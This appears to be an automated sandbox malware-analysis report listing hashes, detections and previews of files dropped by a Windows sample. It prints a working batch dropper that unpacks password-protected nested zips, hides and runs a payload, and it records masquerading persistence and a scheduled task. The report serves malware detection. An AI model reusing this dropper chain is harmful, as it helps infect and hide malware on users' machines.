SSDEEP:	24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
MD5:	579A63BEBCCBACAB8F14132F9FC31B89
SHA1:	FCA8A51077D352741A9C1FF8A493064EF5052F27
SHA-256:	0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
SHA-512:	4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
Malicious:	false
Preview:	KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1799594
Entropy (8bit):	7.99773141173711
Encrypted:	true
SSDEEP:	49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
MD5:	5659EBA6A774F9D5322F249AD989114A
SHA1:	4BFB12AA98A1DC2206BAA0AC611877B815810E4C
SHA-256:	E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
SHA-512:	F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
Malicious:	false
Preview:	PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..

C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799748
Entropy (8bit):	7.997729415613798
Encrypted:	true
SSDEEP:	49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
MD5:	5404286EC7853897B3BA00ADF824D6C1
SHA1:	39E543E08B34311B82F6E909E1E67E2F4AFEC551
SHA-256:	EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
SHA-512:	C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
Malicious:	false
Preview:	PK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./

C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799902
Entropy (8bit):	7.997726708945573
Encrypted:	true
SSDEEP:	49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
MD5:	5EB39BA3698C99891A6B6EB036CFB653
SHA1:	D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
SHA-256:	E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
SHA-512:	6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
Malicious:	false
Preview:	PK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..

C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800056
Entropy (8bit):	7.997723543142523
Encrypted:	true
SSDEEP:	49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
MD5:	7187CC2643AFFAB4CA29D92251C96DEE
SHA1:	AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
SHA-256:	C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
SHA-512:	27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
Malicious:	false
Preview:	PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.

C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800210
Entropy (8bit):	7.997720745184939
Encrypted:	true
SSDEEP:	49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
MD5:	B7D1E04629BEC112923446FDA5391731
SHA1:	814055286F963DDAA5BF3019821CB8A565B56CB8
SHA-256:	4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
SHA-512:	79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
Malicious:	false
Preview:	PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..

C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800364
Entropy (8bit):	7.997716835838842
Encrypted:	true
SSDEEP:	49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
MD5:	0DC4014FACF82AA027904C1BE1D403C1
SHA1:	5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
SHA-256:	A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
SHA-512:	CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
Malicious:	false
Preview:	PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..

C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3473559
Entropy (8bit):	7.9992359395959935
Encrypted:	true
SSDEEP:	98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
MD5:	CEA368FC334A9AEC1ECFF4B15612E5B0
SHA1:	493D23F72731BB570D904014FFDACBBA2334CE26
SHA-256:	07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
SHA-512:	BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
Malicious:	false
Preview:	PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..\|...$..}.`..8......lV1..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T......A..\|...{A.p{.b*.\|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.\|.g....&.d..Y.\|..5O...s.\|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

C:\Users\user\AppData\Local\Temp\main\extracted\in.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:	49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Users\user\AppData\Local\Temp\main\file.bin

Download File

Process:	C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:	49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	false
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:	49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	false
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\main.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	440
Entropy (8bit):	5.0791308599041844
Encrypted:	false
SSDEEP:	12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
MD5:	3626532127E3066DF98E34C3D56A1869
SHA1:	5FA7102F02615AFDE4EFD4ED091744E842C63F78
SHA-256:	2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
SHA-512:	DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
Malicious:	false
Preview:	..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\in.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:	49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.3658942453761327
Encrypted:	false
SSDEEP:	6:hcjSMVupX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lDut0:hcXQ1uQ1CGAFifXVKt0
MD5:	3E9D2D6DC3BA39A84E0D485366334A35
SHA1:	C2BA41ECEE7D8320C75F43214567994AC66FB9D7
SHA-256:	31DE5A4E77E072E4CF00F1ED8BF13435F0E3139DF64E281CD2FA0BA77CEA29B8
SHA-512:	2CC057531E90A1EF08ED49A7F29AB3B0FF0CB83281ECBF9555841791E1E47DED9F1D3E0D052051B2C31AEAD8B0E0334A134B5936149A6050B20ECA4FD2E86FFF
Malicious:	false
Preview:	....?9.7.S.D...5...,F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	5.0682682106683945
Encrypted:	false
SSDEEP:	6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
MD5:	2F644B7E25627553C5731B735473C859
SHA1:	5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
SHA-256:	2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
SHA-512:	E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
Malicious:	false
Preview:	..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.521421490685371
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'063'296 bytes
MD5:	79a76f34927416f5a65bf946e45037ae
SHA1:	db1a4a8db5bb53533b83b6e1bcd1be237a2ca21d
SHA256:	d64545e2fbcc8ac277cc61f993baaeb5da2b7c41df95f0341078c7c4e4ddd332
SHA512:	cbb9cbfba277f3789c39b4ba4669d3ec0fc27d4ce97c1dd1b8e57f71cea46980d34cbf11c29b80c02a11a8b8fd2278c7c761eaad9294f6eb28ac107f6082219f
SSDEEP:	49152:2f6WspjSMgy4UCMNXvTUeJ5UihOMufBgXfCjwQMt4M:vWs1SFy4PMNfTUsUihOMSBIKj3E4
TLSH:	1EE55B92640A76CFD09B17B89457CD437A6E07B5872108C3D82F64BA7EE3CC525BBD28
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x726000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
